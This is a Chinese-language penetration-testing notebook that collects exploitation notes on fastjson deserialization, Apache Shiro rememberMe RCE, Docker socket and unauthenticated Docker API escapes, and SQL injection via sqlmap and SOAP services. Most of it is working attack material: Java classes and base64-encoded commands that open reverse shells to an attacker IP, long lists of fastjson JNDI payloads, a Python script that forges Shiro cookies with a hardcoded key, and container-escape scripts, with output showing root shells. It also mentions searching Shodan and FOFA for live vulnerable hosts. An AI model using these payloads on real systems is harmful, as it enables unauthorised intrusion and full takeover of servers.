只要返回结果不是`0`就说明存在`xp_cmdshell`扩展存储过程。
sql-shell> Exec master..xp_cmdshell 'whoami';
[14:32:58] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
sqlmap -r /home/tool/sqlmap-data/wsdl-inject/net-test1.txt –batch –file-read=”C:\Windows\win.ini”
[14:24:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[14:24:08] [ERROR] none of the SQL injection techniques detected can be used to read files from the underlying file system of the back-end Microsoft SQL Server server
mysql: select password(‘’),concat(‘*‘,sha1(unhex(sha1(‘’)))); sqlmap -d “mysql://root:Hehe123456@192.168.192.120:3306/test” –os-shell
select "hex" into outfile "D:/phpStudy/MySQL/lib/plugin/udf.dll"
CREATE FUNCTION sys_eval RETURNS STRING SONAME ‘udf.dll’;
访问页面,查看反包是一个指定的json格式的数据。请求包:
GET / HTTP/1.1
Host: underattack-host:8090
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
反包:
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Content-Length: 28
Date: Tue, 19 May 2020 01:05:29 GMT
Connection: close
{
"age":25,
"name":"Bob"
}
如上的请求和反包。我们知道了json的格式直接构造参数,给服务器发包看看:
POST / HTTP/1.1
Host: underattack-host:8090
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
Content-Length: 26
{"name":"hello", "age":20}
反包:
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Content-Length: 30
Date: Tue, 19 May 2020 01:06:20 GMT
Connection: close
{
"age":20,
"name":"hello"
}
我们看到服务器端返回包为我们构造的包。
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
参考资料:
首先编译并上传命令执行代码
## cat dnslog.java
import java.lang.Runtime;
import java.lang.Process;
public class dnslog {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/sh", "-c", "ping user.`whoami`.c08aqu.dnslog.cn"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
编译:javac dnslog.java。生成class文件;然后我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并指定受害机器访问9999端口后,去加载远程服务器的类dnslog.class,而class文件就是执行command。
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests ##看到BUILD SUCCESS后进入target
cd target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "https://www.chihou.pro/##dnslog" 9999
* Opening JRMP listener on 9999
开启监听。向靶场服务器发送Payload,带上RMI的地址:
POST数据:
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://47.52.233.92:9999/dnslog",
"autoCommit":true
}
}
----
{
"name":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"x":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://47.52.233.92:9999/expUseful",
"autoCommit":true
}
}
发送完毕后检查RMI服务器的监听记录:
* Opening JRMP listener on 9999
Have connection from /61.133.171.114:11430
Reading message...
Is RMI.lookup call for dnslog 2
Sending remote classloading stub targeting https://www.chihou.pro/dnslog.class
Closing connection
受害机器已经访问了我们的服务器,最后检查是否执行dnslog命令;
user.root.c08aqu.dnslog.cn 61.132.161.12 2020-08-14 15:43:30
user.root.c08aqu.dnslog.cn 61.132.161.5 2020-08-14 15:43:30
user.root.c08aqu.dnslog.cn 61.132.161.12 2020-08-14 15:43:30
user.root.c08aqu.dnslog.cn 61.132.161.5 2020-08-14 15:43:30
可见,ping命令已成功执行;
######## 反弹shell 同样的,直接在poc代码里修改反弹shell的代码即可。
import java.lang.Runtime;
import java.lang.Process;
public class nc {
static {
try{
Runtime rt = Runtime.getRuntime();
String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/47.52.233.92/12341 0>& 1"};
Process pc = rt.exec(commands);
pc.waitFor();
}catch (Exception e) {
//no
}
}
}
同理即可获得反弹shell:
## nc -lvnp 12341
Listening on 0.0.0.0 12341
Connection received on 120.242.209.70 3450
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@5a8812147218:/## whoami
whoami
root
{"rand1":{"@type":"java.net.InetAddress","val":"http://dnslog"}}
{"rand2":{"@type":"java.net.Inet4Address","val":"http://dnslog"}}
{"rand3":{"@type":"java.net.Inet6Address","val":"http://dnslog"}}
{"rand4":{"@type":"java.net.InetSocketAddress"{"address":,"val":"http://dnslog"}}}
{"rand5":{"@type":"java.net.URL","val":"http://dnslog"}}
一些畸形payload,不过依然可以触发dnslog:
{"rand6":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}}
{"@type": "java.lang.AutoCloseable"
{"rand7":Set\[{"@type":"java.net.URL","val":"http://dnslog"}\]}
{"rand8":Set\[{"@type":"java.net.URL","val":"http://dnslog"}
{"rand9":{"@type":"java.net.URL","val":"http://dnslog"}
{"@type": "java.lang.AutoCloseable"
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true}}
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true}
{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://47.52.233.92:9999/expUseful", "autoCommit":true}
// 直接加 [ 是不可以的,因为数组实例化的是Object类型,所以需要将传入的变量设置为数组格式,然后在com.alibaba.fastjson.serializer.ObjectArrayCodec中通过数组对象的getComponentType()可以获得数组元素,即com.sun.rowset.JdbcRowSetImpl对象
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true]}
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://47.52.233.92:9999/expUseful", "autoCommit":true}
//原来在41版本的[还能用
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true]}
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://47.52.233.92:9999/expUseful"}}
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://47.52.233.92:9999/expUseful"}}
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://47.52.233.92:9999/expUseful","autoCommit":true}}}
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://47.52.233.92:9999/expUseful","autoCommit":true}}}
{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://47.52.233.92:9999/expUseful"}
{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"ldap://47.52.233.92:9999/expUseful"}
{\"@type\":\"oracle.jdbc.connector.OracleManagedConnectionFactory\",\"xaDataSourceName\":\"rmi://10.10.20.166:1099/ExportObject\"}
{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"prefix\":\"ldap://10.10.20.166:1389/ExportObject\"}
{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"}"
{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1099/exploit"}
{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://47.52.233.92:9999/expUseful"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://47.52.233.92:9999/expUseful"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://47.52.233.92:9999/expUseful"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"
java.util.Properties","UserTransaction":"ldap://47.52.233.92:9999/expUseful"}}
{"@type":"LLcom.sun.rowset.RowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 1.2.42
{"@type":"[com.sun.rowset.RowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true} 1.2.25v1.2.43
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":"data_source":"rmi://localhost:1099/Exploit"}} 1.2.25
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://127.0.0.1:1099/Exploit\"}1.2.60
{\"@type\":\"org.apache.commons.configuration.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"} 1.2.60
{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"rmi://127.0.0.1:1099/Exploit\"} 1.2.61
{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"asText\":\"rmi://localhost:1099/Exploit\"} 1.2.62
{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"healthCheckRegistry\":\"rmi://localhost:1099/Exploit\"} AnterosDBCPConfig
{\"@type\":\"br.com.anteros.dbcp.AnterosDBCPConfig\",\"metricRegistry\":\"rmi://localhost:1099/Exploit\"} AnterosDBCPConfig
{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\":{\"UserTransaction\":\"rmi://localhost:1099/Exploit\"}} JtaTransactionConfig
漏洞特征:shiro反序列化的特征:1、在返回包的Set-Cookie的值为「rememberMe=deleteMe」2、Apache Shiro版本<= 1.2.4 现在很多j2ee开发都会采用shiro框架来做一些权限控制,框架的优势是出来了,当然就存在劣势。shiro是我在参加工作后才会慢慢去接触到,从一开始的代审,再到黑盒渗透,再到前一段时间刚结束的HW行动。 第一小结,是我自己在实践中的一些理解和经历,希望能够记录下来;第二小结是在学习中在网上的一些学习过程,当时也记录下来了,故此分为两个小结。
在上面的简述中,可以来进行shiro框架的判断,同时,我们可以进一步对shiro框架是否存在反序列化来进行验证: 用到的是Shiroscan脚本,开源在github上,用法就不多赘述。
python3 shiro_rce.py https://shiro.vuln.ip/login.html "ping x.dnslog.cn"
____ _ _ ____
/ ___|| |__ (_)_ __ ___/ ___| ___ __ _ _ __
\___ \| '_ \| | '__/ _ \___ \ / __/ _` | '_ \
___) | | | | | | | (_) |__) | (_| (_| | | | |
|____/|_| |_|_|_| \___/____/ \___\__,_|_| |_|
By 斯文
Welcome To Shiro反序列化 RCE !
[*] 开始检测模块 Class1:CommonsBeanutils1
然后脚本开始对不同的秘钥进行生成cookie,尝试让机器执行命令。等待脚本在跑的时候或者跑完,看一下dnslog上的dns记录,如果存在记录如下所示,那么就说明存在反序列化漏洞使得机器执行了任意代码,反之则无:
x.dnslog.cn shiro.vuln.ip 2020-07-02 16:46:35
x.dnslog.cn shiro.vuln.ip 2020-07-02 16:45:52
x.dnslog.cn shiro.vuln.ip 2020-07-02 16:45:52
x.dnslog.cn shiro.vuln.ip 2020-07-02 16:45:52
当然有的时候用shiroScan扫结束后并没有记录,即不存在漏洞;但是像我,又不死心,于是又在网上折腾找了另外一个能够跑秘钥的探测脚本-_- 作者博客
python shiro_exp.py https://shiro.vuln.ip/login.html
try CipherKey :4AvVhmFLUs0KTA3Kprsdag==
generator payload done.
send payload ok.
checking.....
checking.....
checking.....
checking.....
vulnerable:true url:https://shiro.vuln.ip/login.html CipherKey:3AvVhmFLUs0KTA3Kprsdag==
当然秘钥对于我们理解shiro反序列化框架也有一定的帮助,shiro的反序列化最初的漏洞来源也是因为秘钥硬编码。
通过上面的步骤我们就可以对shiro反序列化做一个判定,肯定是存在RCE漏洞,那么来实现我们的最终目的,GET-shell
一般反弹shell的执行代码bash -i >& /dev/tcp/47.52.233.92/11111 0>&1,首先需要把代码进行base64编码,只有经过base64编码后shiro才认得这个命令,通过shiro自己本身的base64解码最终达到执行命令的目的;
转成base64编码->bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny41Mi4yMzMuOTIvMTIzNCAwPiYx}|{base64,-d}|{bash,-i};像我比较偷懒,就直接在脚本上添加反弹shell,这样的好处就是我们不需要在生成poc的脚本里替换cookie,由脚本自动生成的cookie自动去跑,省事很多
来源:我是转换网址:-)
监听端口等待shell回连(我这里的样例是docker环境)
nc -lvvp 11111
Listening on [0.0.0.0] (family 0, port 11111)
Connection from 59.110.152.168 47274 received!
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@6d5a7848dbef:/# id
id
uid=0(root) gid=0(root) groups=0(root)
使用ysoserial进行流量监听,下面是ysoserial的jar包生成,懂得开发同学都懂。
git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -D skipTests
使用poc代码获得对应的rememberMe的cookie值。
# -*- coding:utf-8 -*-
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
iv = uuid.uuid4().bytes
encryptor = AES.new(key, AES.MODE_CBC, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext
if __name__ == '__main__':
payload = encode_rememberme(sys.argv[1])
print "rememberMe={0}".format(payload.decode())
D:\bin4xin\code\shiro\shrio-poc\ysoserial\target> python .\shrio-poc.py 47.52.233.92:6666
rememberMe=W8BOhPe8Qdy8FJ5N9genqt4WjZaONr1NQ+dXgDCV1RrGHUwMfd8ljlA9AG64t7vzUesOp7YKsz6EFFHgyrq1qRqUiPFBnEBi/NNNpE2UR8CgMsf1KY2rbBurFv1Gwslv2+SL7hy3YNq9cpPWm5S8o+nJpa6IyI9cZ+n7a+6hjB4Yfnf89u3BLi4AxOXL35SotH2AdSX2iZrWgGAcah9oW21JwpC2zj4YMjsGf2tPYUysP873bYYHuSIohaXf3bcq4YuQajMctVmM3IvjeY5Ggva9QRUvo5B1o0sPNHdXGwn/z9t/KWcSeTWE+Dt2f95a9QjEIoic6s88Tv0SKjY6UdCmTxN3vVE8rs1haiA48R1CuUQQiWa9V28m2qkonX9aUEUl4kTGGvF+Y5eB4MaNTw==
抓包,前台登录拦包,勾选Remember Me,截获数据包,替换cookie构造数据包:
POST /doLogin HTTP/1.1
underattack-host: underattack-host:8080
Content-Length: 55
Cache-Control: max-age=0
Origin: http://underattack-host:8080
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://underattack-host:8080/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: rememberMe=RFUadguvSoq4kMm3ZwnkO/MHiokCrqrCURXUqUWaXLBM7/fBF65qvjWDFZeh49zHDRm5oKPU1AhmbEBaYRp3ASrQpHdp7mYrChOi51tmq9qkzWemDnjbUXtp8B6RF1EUNV2q2tKaKlf4AAR1hZIRJGbz4CpLeumNAeWB98f6/T0GaWJGGve9rP6l9/7iU5Y9Xj4ZmSBP6LgMHYF3TJ2DDdTNI4nPITeQI3S+9ol/BmT14Be5m0ENfOkm1cdm3L8Rj/pbeE842Y3nUioEdAXizCrOsCYT+u2QTWHt1YZLmB/xsfQvEV5bRpRJeRv/ps7V00PiXvCeaPQoDs541wqB75+/RRAdqU8TWnJE7YhvQVkxTRLvCjBTtwfkgA3XVA8X+518nh0wSoj8/Ajaoi5MbA==
Connection: close
username=asdmnin&password=asdasd&rememberme=remember-me
使用包监听6666端口:
root@iZj6cgn7odv59wmjjhe6zwZ:/home/tool/shiro_poc/POC-2/ysoserial/target# java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny41Mi4yMzMuOTIvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}'
* Opening JRMP listener on 6666
发包,我们看到jrmp监听的端口已经有流量回流回来了,如下:
Have connection from /underattack-host:58272
Reading message...
Is DGC call for [[0:0:0, 356978429], [0:0:0, 2006635131]]
Sending return with payload for obj [0:0:0, 2]
Closing connection
Have connection from /underattack-host:58274
Reading message...
Is DGC call for [[0:0:0, 356978429], [0:0:0, -1104978848], [0:0:0, 2006635131]]
Sending return with payload for obj [0:0:0, 2]
Closing connection
以上。
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
Welcome to Cloud Shell! Type "help" to get started.
Your Cloud Platform project in this session is set to avid-rope-267508.
Use “gcloud config set project [PROJECT_ID]” to change to a different project.
chihou_pro@cloudshell:~ (avid-rope-267508)$ sudo su
root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/home/chihou_pro# ls
README-cloudshell.txt
很明显的看到,使用了docker容器,参考:
root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/home/chihou_pro# cat /proc/1/cgroup
12:hugetlb:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
11:perf_event:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
10:cpu,cpuacct:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
9:cpuset:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
8:memory:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
7:devices:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
6:freezer:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
5:blkio:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
4:rdma:/
3:pids:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
2:net_cls,net_prio:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
1:name=systemd:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
0::/system.slice/containerd.service
我们可以看到kubepods等关键词,浏览了文件系统之后,注意到有2个Docker unix套接字可用。在/run/docker.sock中,这是我们在Cloud Shell中运行的Docker客户端的默认路径。
root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/# cat run/
docker/ docker.sock google/ metrics/ postgresql/ sshd/ supervisor.pid xtables.lock
docker.pid docker-ssd.pid lock/ mount/ rsyslogd.pid sshd.pid utmp
/google/host/var/run/docker.sock套接字,这是第二个。
root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/# ls /google/host/var/run/
agetty.reload cloud-init command-recorder crash_reporter docker dockershim.sock initctl lockbox lvm metrics sshd.pid systemd tmpfiles.d user vm
blkid cloudshell-creds containerd dbus docker.pid docker.sock lock log machine-id mount sudo theia udev utmp xtables.lock
然后根据上面的可利用套接字准备一个bash文件进行docker逃逸:-) new a bash file to escape docker in google_cloud_shell.
sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name LiveOverflow-container -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start LiveOverflow-container
sudo docker -H unix:///google/host/var/run/docker.sock exec -it LiveOverflow-container /bin/sh
运行bash文件
root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/home/chihou_pro# bash docker_escape.sh
latest: Pulling from library/alpine
Digest: sha256:39eda93d15866957feaee28f8fc5adb545276a64147445c64992ef69804dbf01
Status: Image is up to date for alpine:latest
docker.io/library/alpine:latest
docker: Error response from daemon: Conflict. The container name "/LiveOverflow-container" is already in use by container "2e2896994c459d7be0a6acb613c8be509ef5158cb97ddac4b5e30b2fed770d56". You have to remove (or rename) that container to be able to reuse that name.
See 'docker run --help'.
LiveOverflow-container
/ # whoami
root
如上,逃逸成功
验证漏洞存在:
[root@iZ2ze9ebgot9gy5c2mi5ecZ unauthorized-rce]# curl http://vuln_docker_ip:2375/info
{"ID":"OY55:HR25:LKHP:XTLU:LCID:Y64D:46WQ:4T5U:U2SF:5PVW:R7I3:T6KV","Containers":2,"ContainersRunning":1,"ContainersPaused":0,"ContainersStopped":1,"Images":1,"Driver":"overlay2","DriverStatus":[["Backing Filesystem","extfs"],["Supports d_type","true"],["Native Overlay Diff","true"]],"SystemStatus":null,"Plugins":{"Volume":["local"],"Network":["bridge","host","macvlan","null","overlay"],"Authorization":null,"Log":["awslogs","fluentd","gcplogs","gelf","journald","json-file","logentries","splunk","syslog"]},"MemoryLimit":true,"SwapLimit":true,"KernelMemory":true,"CpuCfsPeriod":true,"CpuCfsQuota":true,"CPUShares":true,"CPUSet":true,"IPv4Forwarding":true,"BridgeNfIptables":false,"BridgeNfIp6tables":false,"Debug":false,"NFd":29,"OomKillDisable":true,"NGoroutines":51,"SystemTime":"2020-05-22T02:44:08.778253143Z","LoggingDriver":"json-file","CgroupDriver":"cgroupfs","NEventsListener":0,"KernelVersion":"3.10.0-1062.12.1.el7.x86_64","OperatingSystem":"Alpine Linux v3.7 (containerized)","OSType":"linux","Architecture":"x86_64","IndexServerAddress":"https://index.docker.io/v1/","RegistryConfig":{"AllowNondistributableArtifactsCIDRs":[],"AllowNondistributableArtifactsHostnames":[],"InsecureRegistryCIDRs":["127.0.0.0/8"],"IndexConfigs":{"docker.io":{"Name":"docker.io","Mirrors":[],"Secure":true,"Official":true}},"Mirrors":[]},"NCPU":2,"MemTotal":3973296128,"GenericResources":null,"DockerRootDir":"/var/lib/docker","HttpProxy":"","HttpsProxy":"","NoProxy":"","Name":"14e1a228e781","Labels":[],"ExperimentalBuild":false,"ServerVersion":"18.03.0-ce","ClusterStore":"","ClusterAdvertise":"","Runtimes":{"runc":{"path":"docker-runc"}},"DefaultRuntime":"runc","Swarm":{"NodeID":"","NodeAddr":"","LocalNodeState":"inactive","ControlAvailable":false,"Error":"","RemoteManagers":null},"LiveRestoreEnabled":false,"Isolation":"","InitBinary":"docker-init","ContainerdCommit":{"ID":"cfd04396dc68220d1cecbe686a6cc3aa5ce3667c","Expected":"cfd04396dc68220d1cecbe686a6cc3aa5ce3667c"},"RuncCommit":{"ID":"4fc53a81fb7c994640722ac585fa9ca548971871","Expected":"4fc53a81fb7c994640722ac585fa9ca548971871"},"InitCommit":{"ID":"949e6fa","Expected":"949e6fa"},"SecurityOptions":["name=seccomp,profile=default"]}
如上,访问info目录返回了关于docker的信息。直接攻击机运行命令:
root@shell:/home/tool/docker/unauth_rce# docker -H=tcp://vuln_docker_ip:2375 run -it -v /:/tmp --entrypoint /bin/sh alpine:latest
/ # whoami
root
/ # uname -a
Linux aa5ae15c12f0 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64 Linux
/ # ifconfig
eth0 Link encap:Ethernet HWaddr 02:42:AC:11:00:02
inet addr:172.17.0.2 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:656 (656.0 B) TX bytes:0 (0.0 B)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
震惊有木有,我们可以在靶场上复现,现在在撒旦上、fofa上都很少能找到这种程度的漏洞了;在宿主机上查看docker信息:
[root@shell unauthorized-rce]# bash /home/docker_shell_exe.sh
docker0 Link encap:Ethernet HWaddr 02:42:ED:E8:4E:97
inet addr:172.17.0.1 Bcast:172.17.255.255 Mask:255.255.0.0
inet6 addr: fe80::42:edff:fee8:4e97/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:3 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:266 (266.0 B)
eth0 Link encap:Ethernet HWaddr 02:42:AC:14:00:02
inet addr:172.20.0.2 Bcast:0.0.0.0 Mask:255.255.0.0
inet6 addr: fe80::42:acff:fe14:2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:45363 errors:0 dropped:0 overruns:0 frame:0
TX packets:41902 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:10257217 (9.7 MiB) TX bytes:3704534 (3.5 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:55 errors:0 dropped:0 overruns:0 frame:0
TX packets:55 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:6487 (6.3 KiB) TX bytes:6487 (6.3 KiB)
返回的信息如上,与我们所使用的靶机机器一致;
由于一些机缘巧合,发现了一些SQL注入的新姿势,记录一下;
记录就是一个简单的练手记录,感觉非常有意思;
在shodan、fofa上搜asmx,找到疑似存在wsdl注入的站,大概的是这样的:http://vuln_ip:8081/WebService1.asmx?WSDL,一般我们可以通过手工的方式去尝试注入,这样的站访问进去后是类似xml的文件,里面是各种与服务器交互的参数,比如登录页面的username、passwd参数,开发者们都已经配置好这些参数;
如下,这是一个参数对应的xml标签:
<s:element name="HelloWorldResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="HelloWorldResult" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
我们手工的方式是构造一个SOAP对应的参数的post包发给asmx网页。post包如下:
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://tempuri.org/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<urn:HelloWorldResult>
<urn:ins>1*</urn:ins>
</urn:HelloWorldResult>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
大致的一个构造思路就是这样的,然后观察服务器数据库的报错情况,我们可以直接把数据post包拿过来跑:
root@#:/home/tool/sqlmap-data/wsdl-inject# sqlmap -r net-test1.txt --batch
___
__H__
___ ___[.]_____ ___ ___ {1.2.4#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
